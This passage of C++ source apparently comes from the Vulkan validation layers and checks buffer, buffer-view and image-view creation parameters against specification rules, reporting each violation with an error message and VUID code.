VK_WHOLE_SIZE) { // Range must be greater than 0 if (range <= 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT, HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-range-00928", "If VkBufferViewCreateInfo range (%" PRIuLEAST64 ") does not equal VK_WHOLE_SIZE, range must be greater than 0.", range); } // Range must be a multiple of the element size of format const size_t format_size = FormatElementSize(pCreateInfo->format); if (range % format_size != 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT, HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-range-00929", "If VkBufferViewCreateInfo range (%" PRIuLEAST64 ") does not equal VK_WHOLE_SIZE, range must be a multiple of the element size of the format " "(" PRINTF_SIZE_T_SPECIFIER ").", range, format_size); } // Range divided by the element size of format must be less than or equal to VkPhysicalDeviceLimits::maxTexelBufferElements if (range / format_size > device_limits->maxTexelBufferElements) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT, HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-range-00930", "If VkBufferViewCreateInfo range (%" PRIuLEAST64 ") does not equal VK_WHOLE_SIZE, range divided by the element size of the format (" PRINTF_SIZE_T_SPECIFIER ") must be less than or equal to VkPhysicalDeviceLimits::maxTexelBufferElements (%" PRIuLEAST32 ").", range, format_size, device_limits->maxTexelBufferElements); } // The sum of range and offset must be less than or equal to the size of buffer if (range + pCreateInfo->offset > buffer_state->createInfo.size) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT, HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-offset-00931", "If VkBufferViewCreateInfo range (%" PRIuLEAST64 ") does not equal VK_WHOLE_SIZE, the sum of offset (%" PRIuLEAST64 ") and range must be less than or equal to the size of the buffer (%" PRIuLEAST64 ").", range, pCreateInfo->offset, buffer_state->createInfo.size); } } return skip; } bool CoreChecks::ValidateBufferViewBuffer(const BUFFER_STATE *buffer_state, const VkBufferViewCreateInfo *pCreateInfo) { bool skip = false; const VkFormatProperties format_properties = GetPDFormatProperties(pCreateInfo->format); if ((buffer_state->createInfo.usage & VK_BUFFER_USAGE_UNIFORM_TEXEL_BUFFER_BIT) && !(format_properties.bufferFeatures & VK_FORMAT_FEATURE_UNIFORM_TEXEL_BUFFER_BIT)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT, HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-buffer-00933", "If buffer was created with `usage` containing VK_BUFFER_USAGE_UNIFORM_TEXEL_BUFFER_BIT, format must " "be supported for uniform texel buffers"); } if ((buffer_state->createInfo.usage & VK_BUFFER_USAGE_STORAGE_TEXEL_BUFFER_BIT) && !(format_properties.bufferFeatures & VK_FORMAT_FEATURE_STORAGE_TEXEL_BUFFER_BIT)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT, HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-buffer-00934", "If buffer was created with `usage` containing VK_BUFFER_USAGE_STORAGE_TEXEL_BUFFER_BIT, format must " "be supported for storage texel buffers"); } return skip; } bool CoreChecks::PreCallValidateCreateBuffer(VkDevice device, const VkBufferCreateInfo *pCreateInfo, const VkAllocationCallbacks *pAllocator, VkBuffer *pBuffer) { bool skip = false; // TODO: Add check for "VUID-vkCreateBuffer-flags-00911" (sparse address space accounting) if ((pCreateInfo->flags & VK_BUFFER_CREATE_SPARSE_BINDING_BIT) && (!GetEnabledFeatures()->core.sparseBinding)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkBufferCreateInfo-flags-00915", "vkCreateBuffer(): the sparseBinding device feature is disabled: Buffers cannot be created with the " "VK_BUFFER_CREATE_SPARSE_BINDING_BIT set."); } if ((pCreateInfo->flags & VK_BUFFER_CREATE_SPARSE_RESIDENCY_BIT) && (!GetEnabledFeatures()->core.sparseResidencyBuffer)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkBufferCreateInfo-flags-00916", "vkCreateBuffer(): the sparseResidencyBuffer device feature is disabled: Buffers cannot be created with " "the VK_BUFFER_CREATE_SPARSE_RESIDENCY_BIT set."); } if ((pCreateInfo->flags & VK_BUFFER_CREATE_SPARSE_ALIASED_BIT) && (!GetEnabledFeatures()->core.sparseResidencyAliased)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkBufferCreateInfo-flags-00917", "vkCreateBuffer(): the sparseResidencyAliased device feature is disabled: Buffers cannot be created with " "the VK_BUFFER_CREATE_SPARSE_ALIASED_BIT set."); } auto chained_devaddr_struct = lvl_find_in_chain<VkBufferDeviceAddressCreateInfoEXT>(pCreateInfo->pNext); if (chained_devaddr_struct) { if (!(pCreateInfo->flags & VK_BUFFER_CREATE_DEVICE_ADDRESS_CAPTURE_REPLAY_BIT_EXT) && chained_devaddr_struct->deviceAddress != 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkBufferCreateInfo-deviceAddress-02604", "vkCreateBuffer(): Non-zero VkBufferDeviceAddressCreateInfoEXT::deviceAddress " "requires VK_BUFFER_CREATE_DEVICE_ADDRESS_CAPTURE_REPLAY_BIT_EXT."); } } if ((pCreateInfo->flags & VK_BUFFER_CREATE_DEVICE_ADDRESS_CAPTURE_REPLAY_BIT_EXT) && !GetEnabledFeatures()->buffer_address.bufferDeviceAddressCaptureReplay) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkBufferCreateInfo-flags-02605", "vkCreateBuffer(): the bufferDeviceAddressCaptureReplay device feature is disabled: Buffers cannot be created with " "the VK_BUFFER_CREATE_DEVICE_ADDRESS_CAPTURE_REPLAY_BIT_EXT set."); } if ((pCreateInfo->usage & VK_BUFFER_USAGE_SHADER_DEVICE_ADDRESS_BIT_EXT) && !GetEnabledFeatures()->buffer_address.bufferDeviceAddress) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkBufferCreateInfo-usage-02606", "vkCreateBuffer(): the bufferDeviceAddress device feature is disabled: Buffers cannot be created with " "the VK_BUFFER_USAGE_SHADER_DEVICE_ADDRESS_BIT_EXT set."); } if (pCreateInfo->sharingMode == VK_SHARING_MODE_CONCURRENT && pCreateInfo->pQueueFamilyIndices) { skip |= ValidateQueueFamilies(pCreateInfo->queueFamilyIndexCount, pCreateInfo->pQueueFamilyIndices, "vkCreateBuffer", "pCreateInfo->pQueueFamilyIndices", "VUID-VkBufferCreateInfo-sharingMode-01419", "VUID-VkBufferCreateInfo-sharingMode-01419", false); } return skip; } void CoreChecks::PostCallRecordCreateBuffer(VkDevice device, const VkBufferCreateInfo *pCreateInfo, const VkAllocationCallbacks *pAllocator, VkBuffer *pBuffer, VkResult result) { if (result != VK_SUCCESS) return; // TODO : This doesn't create deep copy of pQueueFamilyIndices so need to fix that if/when we want that data to be valid GetBufferMap()->insert(std::make_pair(*pBuffer, std::unique_ptr<BUFFER_STATE>(new BUFFER_STATE(*pBuffer, pCreateInfo)))); } bool CoreChecks::PreCallValidateCreateBufferView(VkDevice device, const VkBufferViewCreateInfo *pCreateInfo, const VkAllocationCallbacks *pAllocator, VkBufferView *pView) { bool skip = false; BUFFER_STATE *buffer_state = GetBufferState(pCreateInfo->buffer); // If this isn't a sparse buffer, it needs to have memory backing it at CreateBufferView time if (buffer_state) { skip |= ValidateMemoryIsBoundToBuffer(buffer_state, "vkCreateBufferView()", "VUID-VkBufferViewCreateInfo-buffer-00935"); // In order to create a valid buffer view, the buffer must have been created with at least one of the following flags: // UNIFORM_TEXEL_BUFFER_BIT or STORAGE_TEXEL_BUFFER_BIT skip |= ValidateBufferUsageFlags(buffer_state, VK_BUFFER_USAGE_UNIFORM_TEXEL_BUFFER_BIT | VK_BUFFER_USAGE_STORAGE_TEXEL_BUFFER_BIT, false, "VUID-VkBufferViewCreateInfo-buffer-00932", "vkCreateBufferView()", "VK_BUFFER_USAGE_[STORAGE|UNIFORM]_TEXEL_BUFFER_BIT"); // Buffer view offset must be less than the size of buffer if (pCreateInfo->offset >= buffer_state->createInfo.size) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT, HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-offset-00925", "VkBufferViewCreateInfo offset (%" PRIuLEAST64 ") must be less than the size of the buffer (%" PRIuLEAST64 ").", pCreateInfo->offset, buffer_state->createInfo.size); } const VkPhysicalDeviceLimits *device_limits = &(GetPDProperties()->limits); // Buffer view offset must be a multiple of VkPhysicalDeviceLimits::minTexelBufferOffsetAlignment if ((pCreateInfo->offset % device_limits->minTexelBufferOffsetAlignment) != 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT, HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-offset-00926", "VkBufferViewCreateInfo offset (%" PRIuLEAST64 ") must be a multiple of VkPhysicalDeviceLimits::minTexelBufferOffsetAlignment (%" PRIuLEAST64 ").", pCreateInfo->offset, device_limits->minTexelBufferOffsetAlignment); } skip |= ValidateBufferViewRange(buffer_state, pCreateInfo, device_limits); skip |= ValidateBufferViewBuffer(buffer_state, pCreateInfo); } return skip; } void CoreChecks::PostCallRecordCreateBufferView(VkDevice device, const VkBufferViewCreateInfo *pCreateInfo, const VkAllocationCallbacks *pAllocator, VkBufferView *pView, VkResult result) { if (result != VK_SUCCESS) return; (*GetBufferViewMap())[*pView] = std::unique_ptr<BUFFER_VIEW_STATE>(new BUFFER_VIEW_STATE(*pView, pCreateInfo)); } // For the given format verify that the aspect masks make sense bool CoreChecks::ValidateImageAspectMask(VkImage image, VkFormat format, VkImageAspectFlags aspect_mask, const char *func_name, const char *vuid) { bool skip = false; VkDebugReportObjectTypeEXT objectType = VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT; if (image != VK_NULL_HANDLE) { objectType = VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT; } if (FormatIsColor(format)) { if ((aspect_mask & VK_IMAGE_ASPECT_COLOR_BIT) != VK_IMAGE_ASPECT_COLOR_BIT) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid, "%s: Color image formats must have the VK_IMAGE_ASPECT_COLOR_BIT set.", func_name); } else if ((aspect_mask & VK_IMAGE_ASPECT_COLOR_BIT) != aspect_mask) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid, "%s: Color image formats must have ONLY the VK_IMAGE_ASPECT_COLOR_BIT set.", func_name); } } else if (FormatIsDepthAndStencil(format)) { if ((aspect_mask & (VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT)) == 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid, "%s: Depth/stencil image formats must have at least one of VK_IMAGE_ASPECT_DEPTH_BIT and " "VK_IMAGE_ASPECT_STENCIL_BIT set.", func_name); } else if ((aspect_mask & (VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT)) != aspect_mask) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid, "%s: Combination depth/stencil image formats can have only the VK_IMAGE_ASPECT_DEPTH_BIT and " "VK_IMAGE_ASPECT_STENCIL_BIT set.", func_name); } } else if (FormatIsDepthOnly(format)) { if ((aspect_mask & VK_IMAGE_ASPECT_DEPTH_BIT) != VK_IMAGE_ASPECT_DEPTH_BIT) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid, "%s: Depth-only image formats must have the VK_IMAGE_ASPECT_DEPTH_BIT set.", func_name); } else if ((aspect_mask & VK_IMAGE_ASPECT_DEPTH_BIT) != aspect_mask) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid, "%s: Depth-only image formats can have only the VK_IMAGE_ASPECT_DEPTH_BIT set.", func_name); } } else if (FormatIsStencilOnly(format)) { if ((aspect_mask & VK_IMAGE_ASPECT_STENCIL_BIT) != VK_IMAGE_ASPECT_STENCIL_BIT) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid, "%s: Stencil-only image formats must have the VK_IMAGE_ASPECT_STENCIL_BIT set.", func_name); } else if ((aspect_mask & VK_IMAGE_ASPECT_STENCIL_BIT) != aspect_mask) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid, "%s: Stencil-only image formats can have only the VK_IMAGE_ASPECT_STENCIL_BIT set.", func_name); } } else if (FormatIsMultiplane(format)) { VkImageAspectFlags valid_flags = VK_IMAGE_ASPECT_COLOR_BIT | VK_IMAGE_ASPECT_PLANE_0_BIT | VK_IMAGE_ASPECT_PLANE_1_BIT; if (3 == FormatPlaneCount(format)) { valid_flags = valid_flags | VK_IMAGE_ASPECT_PLANE_2_BIT; } if ((aspect_mask & valid_flags) != aspect_mask) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid, "%s: Multi-plane image formats may have only VK_IMAGE_ASPECT_COLOR_BIT or VK_IMAGE_ASPECT_PLANE_n_BITs " "set, where n = [0, 1, 2].", func_name); } } return skip; } bool CoreChecks::ValidateImageSubresourceRange(const uint32_t image_mip_count, const uint32_t image_layer_count, const VkImageSubresourceRange &subresourceRange, const char *cmd_name, const char *param_name, const char *image_layer_count_var_name, const uint64_t image_handle, SubresourceRangeErrorCodes errorCodes) { bool skip = false; // Validate mip levels if (subresourceRange.baseMipLevel >= image_mip_count) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle, errorCodes.base_mip_err, "%s: %s.baseMipLevel (= %" PRIu32 ") is greater or equal to the mip level count of the image (i.e. greater or equal to %" PRIu32 ").", cmd_name, param_name, subresourceRange.baseMipLevel, image_mip_count); } if (subresourceRange.levelCount != VK_REMAINING_MIP_LEVELS) { if (subresourceRange.levelCount == 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle, errorCodes.mip_count_err, "%s: %s.levelCount is 0.", cmd_name, param_name); } else { const uint64_t necessary_mip_count = uint64_t{subresourceRange.baseMipLevel} + uint64_t{subresourceRange.levelCount}; if (necessary_mip_count > image_mip_count) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle, errorCodes.mip_count_err, "%s: %s.baseMipLevel + .levelCount (= %" PRIu32 " + %" PRIu32 " = %" PRIu64 ") is greater than the mip level count of the image (i.e. greater than %" PRIu32 ").", cmd_name, param_name, subresourceRange.baseMipLevel, subresourceRange.levelCount, necessary_mip_count, image_mip_count); } } } // Validate array layers if (subresourceRange.baseArrayLayer >= image_layer_count) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle, errorCodes.base_layer_err, "%s: %s.baseArrayLayer (= %" PRIu32 ") is greater or equal to the %s of the image when it was created (i.e. greater or equal to %" PRIu32 ").", cmd_name, param_name, subresourceRange.baseArrayLayer, image_layer_count_var_name, image_layer_count); } if (subresourceRange.layerCount != VK_REMAINING_ARRAY_LAYERS) { if (subresourceRange.layerCount == 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle, errorCodes.layer_count_err, "%s: %s.layerCount is 0.", cmd_name, param_name); } else { const uint64_t necessary_layer_count = uint64_t{subresourceRange.baseArrayLayer} + uint64_t{subresourceRange.layerCount}; if (necessary_layer_count > image_layer_count) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle, errorCodes.layer_count_err, "%s: %s.baseArrayLayer + .layerCount (= %" PRIu32 " + %" PRIu32 " = %" PRIu64 ") is greater than the %s of the image when it was created (i.e. greater than %" PRIu32 ").", cmd_name, param_name, subresourceRange.baseArrayLayer, subresourceRange.layerCount, necessary_layer_count, image_layer_count_var_name, image_layer_count); } } } return skip; } bool CoreChecks::ValidateCreateImageViewSubresourceRange(const IMAGE_STATE *image_state, bool is_imageview_2d_type, const VkImageSubresourceRange &subresourceRange) { bool is_khr_maintenance1 = GetDeviceExtensions()->vk_khr_maintenance1; bool is_image_slicable = image_state->createInfo.imageType == VK_IMAGE_TYPE_3D && (image_state->createInfo.flags & VK_IMAGE_CREATE_2D_ARRAY_COMPATIBLE_BIT_KHR); bool is_3D_to_2D_map = is_khr_maintenance1 && is_image_slicable && is_imageview_2d_type; const auto image_layer_count = is_3D_to_2D_map ? image_state->createInfo.extent.depth : image_state->createInfo.arrayLayers; const auto image_layer_count_var_name = is_3D_to_2D_map ? "extent.depth" : "arrayLayers"; SubresourceRangeErrorCodes subresourceRangeErrorCodes = {}; subresourceRangeErrorCodes.base_mip_err = "VUID-VkImageViewCreateInfo-subresourceRange-01478"; subresourceRangeErrorCodes.mip_count_err = "VUID-VkImageViewCreateInfo-subresourceRange-01718"; subresourceRangeErrorCodes.base_layer_err = is_khr_maintenance1 ? (is_3D_to_2D_map ? "VUID-VkImageViewCreateInfo-image-01484" : "VUID-VkImageViewCreateInfo-image-01482") : "VUID-VkImageViewCreateInfo-subresourceRange-01480"; subresourceRangeErrorCodes.layer_count_err = is_khr_maintenance1 ? (is_3D_to_2D_map ? "VUID-VkImageViewCreateInfo-subresourceRange-01485" : "VUID-VkImageViewCreateInfo-subresourceRange-01483") : "VUID-VkImageViewCreateInfo-subresourceRange-01719"; return ValidateImageSubresourceRange(image_state->createInfo.mipLevels, image_layer_count, subresourceRange, "vkCreateImageView", "pCreateInfo->subresourceRange", image_layer_count_var_name, HandleToUint64(image_state->image), subresourceRangeErrorCodes); } bool CoreChecks::ValidateCmdClearColorSubresourceRange(const IMAGE_STATE *image_state, const VkImageSubresourceRange &subresourceRange, const char *param_name) { SubresourceRangeErrorCodes subresourceRangeErrorCodes = {}; subresourceRangeErrorCodes.base_mip_err = "VUID-vkCmdClearColorImage-baseMipLevel-01470"; subresourceRangeErrorCodes.mip_count_err = "VUID-vkCmdClearColorImage-pRanges-01692"; subresourceRangeErrorCodes.base_layer_err = "VUID-vkCmdClearColorImage-baseArrayLayer-01472"; subresourceRangeErrorCodes.layer_count_err = "VUID-vkCmdClearColorImage-pRanges-01693"; return ValidateImageSubresourceRange(image_state->createInfo.mipLevels, image_state->createInfo.arrayLayers, subresourceRange, "vkCmdClearColorImage", param_name, "arrayLayers", HandleToUint64(image_state->image), subresourceRangeErrorCodes); } bool CoreChecks::ValidateCmdClearDepthSubresourceRange(const IMAGE_STATE *image_state, const VkImageSubresourceRange &subresourceRange, const char *param_name) { SubresourceRangeErrorCodes subresourceRangeErrorCodes = {}; subresourceRangeErrorCodes.base_mip_err = "VUID-vkCmdClearDepthStencilImage-baseMipLevel-01474"; subresourceRangeErrorCodes.mip_count_err = "VUID-vkCmdClearDepthStencilImage-pRanges-01694"; subresourceRangeErrorCodes.base_layer_err = "VUID-vkCmdClearDepthStencilImage-baseArrayLayer-01476"; subresourceRangeErrorCodes.layer_count_err = "VUID-vkCmdClearDepthStencilImage-pRanges-01695"; return ValidateImageSubresourceRange(image_state->createInfo.mipLevels, image_state->createInfo.arrayLayers, subresourceRange, "vkCmdClearDepthStencilImage", param_name, "arrayLayers", HandleToUint64(image_state->image), subresourceRangeErrorCodes); } bool CoreChecks::ValidateImageBarrierSubresourceRange(const IMAGE_STATE *image_state, const VkImageSubresourceRange &subresourceRange, const char *cmd_name, const char *param_name) { SubresourceRangeErrorCodes subresourceRangeErrorCodes = {}; subresourceRangeErrorCodes.base_mip_err = "VUID-VkImageMemoryBarrier-subresourceRange-01486"; subresourceRangeErrorCodes.mip_count_err = "VUID-VkImageMemoryBarrier-subresourceRange-01724"; subresourceRangeErrorCodes.base_layer_err = "VUID-VkImageMemoryBarrier-subresourceRange-01488"; subresourceRangeErrorCodes.layer_count_err = "VUID-VkImageMemoryBarrier-subresourceRange-01725"; return ValidateImageSubresourceRange(image_state->createInfo.mipLevels, image_state->createInfo.arrayLayers, subresourceRange, cmd_name, param_name, "arrayLayers", HandleToUint64(image_state->image), subresourceRangeErrorCodes); } bool CoreChecks::PreCallValidateCreateImageView(VkDevice device, const VkImageViewCreateInfo *pCreateInfo, const VkAllocationCallbacks *pAllocator, VkImageView *pView) { bool skip = false; IMAGE_STATE *image_state = GetImageState(pCreateInfo->image); if (image_state) { skip |= ValidateImageUsageFlags( image_state, VK_IMAGE_USAGE_SAMPLED_BIT | VK_IMAGE_USAGE_STORAGE_BIT | VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT | VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT | VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT | VK_IMAGE_USAGE_SHADING_RATE_IMAGE_BIT_NV, false, kVUIDUndefined, "vkCreateImageView()", "VK_IMAGE_USAGE_[SAMPLED|STORAGE|COLOR_ATTACHMENT|DEPTH_STENCIL_ATTACHMENT|INPUT_ATTACHMENT|SHADING_RATE_IMAGE]_BIT"); // If this isn't a sparse image, it needs to have memory backing it at CreateImageView time skip |= ValidateMemoryIsBoundToImage(image_state, "vkCreateImageView()", "VUID-VkImageViewCreateInfo-image-01020"); // Checks imported from image layer skip |= ValidateCreateImageViewSubresourceRange( image_state, pCreateInfo->viewType == VK_IMAGE_VIEW_TYPE_2D || pCreateInfo->viewType == VK_IMAGE_VIEW_TYPE_2D_ARRAY, pCreateInfo->subresourceRange); VkImageCreateFlags image_flags = image_state->createInfo.flags; VkFormat image_format = image_state->createInfo.format; VkImageUsageFlags image_usage = image_state->createInfo.usage; VkImageTiling image_tiling = image_state->createInfo.tiling; VkFormat view_format = pCreateInfo->format; VkImageAspectFlags aspect_mask = pCreateInfo->subresourceRange.aspectMask; VkImageType image_type = image_state->createInfo.imageType; VkImageViewType view_type = pCreateInfo->viewType; // If there's a chained VkImageViewUsageCreateInfo struct, modify image_usage to match auto chained_ivuci_struct = lvl_find_in_chain<VkImageViewUsageCreateInfoKHR>(pCreateInfo->pNext); if (chained_ivuci_struct) { if (chained_ivuci_struct->usage & ~image_usage) { std::stringstream ss; ss << "vkCreateImageView(): Chained VkImageViewUsageCreateInfo usage field (0x" << std::hex << chained_ivuci_struct->usage << ") must not include flags not present in underlying image's usage (0x" << image_usage << ")."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewUsageCreateInfo-usage-01587", "%s", ss.str().c_str()); } image_usage = chained_ivuci_struct->usage; } // Validate VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT state, if view/image formats differ if ((image_flags & VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT) && (image_format != view_format)) { if (FormatIsMultiplane(image_format)) { // View format must match the multiplane compatible format uint32_t plane = 3; // invalid switch (aspect_mask) { case VK_IMAGE_ASPECT_PLANE_0_BIT: plane = 0; break; case VK_IMAGE_ASPECT_PLANE_1_BIT: plane = 1; break; case VK_IMAGE_ASPECT_PLANE_2_BIT: plane = 2; break; default: break; } VkFormat compat_format = FindMultiplaneCompatibleFormat(image_format, plane); if (view_format != compat_format) { std::stringstream ss; ss << "vkCreateImageView(): ImageView format " << string_VkFormat(view_format) << " is not compatible with plane " << plane << " of underlying image format " << string_VkFormat(image_format) << ", must be " << string_VkFormat(compat_format) << "."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-01586", "%s", ss.str().c_str()); } } else { if ((!GetDeviceExtensions()->vk_khr_maintenance2 || !(image_flags & VK_IMAGE_CREATE_BLOCK_TEXEL_VIEW_COMPATIBLE_BIT_KHR))) { // Format MUST be compatible (in the same format compatibility class) as the format the image was created with if (FormatCompatibilityClass(image_format) != FormatCompatibilityClass(view_format)) { std::stringstream ss; ss << "vkCreateImageView(): ImageView format " << string_VkFormat(view_format) << " is not in the same format compatibility class as image (" << report_data->FormatHandle(pCreateInfo->image).c_str() << ") format " << string_VkFormat(image_format) << ". Images created with the VK_IMAGE_CREATE_MUTABLE_FORMAT BIT " << "can support ImageViews with differing formats but they must be in the same compatibility class."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-01018", "%s", ss.str().c_str()); } } } } else { // Format MUST be IDENTICAL to the format the image was created with if (image_format != view_format) { std::stringstream ss; ss << "vkCreateImageView() format " << string_VkFormat(view_format) << " differs from image " << report_data->FormatHandle(pCreateInfo->image).c_str() << " format " << string_VkFormat(image_format) << ". Formats MUST be IDENTICAL unless VK_IMAGE_CREATE_MUTABLE_FORMAT BIT was set on image creation."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-01019", "%s", ss.str().c_str()); } } // Validate correct image aspect bits for desired formats and format consistency skip |= ValidateImageAspectMask(image_state->image, image_format, aspect_mask, "vkCreateImageView()"); switch (image_type) { case VK_IMAGE_TYPE_1D: if (view_type != VK_IMAGE_VIEW_TYPE_1D && view_type != VK_IMAGE_VIEW_TYPE_1D_ARRAY) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-subResourceRange-01021", "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.", string_VkImageViewType(view_type), string_VkImageType(image_type)); } break; case VK_IMAGE_TYPE_2D: if (view_type != VK_IMAGE_VIEW_TYPE_2D && view_type != VK_IMAGE_VIEW_TYPE_2D_ARRAY) { if ((view_type == VK_IMAGE_VIEW_TYPE_CUBE || view_type == VK_IMAGE_VIEW_TYPE_CUBE_ARRAY) && !(image_flags & VK_IMAGE_CREATE_CUBE_COMPATIBLE_BIT)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-01003", "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.", string_VkImageViewType(view_type), string_VkImageType(image_type)); } else if (view_type != VK_IMAGE_VIEW_TYPE_CUBE && view_type != VK_IMAGE_VIEW_TYPE_CUBE_ARRAY) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-subResourceRange-01021", "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.", string_VkImageViewType(view_type), string_VkImageType(image_type)); } } break; case VK_IMAGE_TYPE_3D: if (GetDeviceExtensions()->vk_khr_maintenance1) { if (view_type != VK_IMAGE_VIEW_TYPE_3D) { if ((view_type == VK_IMAGE_VIEW_TYPE_2D || view_type == VK_IMAGE_VIEW_TYPE_2D_ARRAY)) { if (!(image_flags & VK_IMAGE_CREATE_2D_ARRAY_COMPATIBLE_BIT_KHR)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-01005", "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.", string_VkImageViewType(view_type), 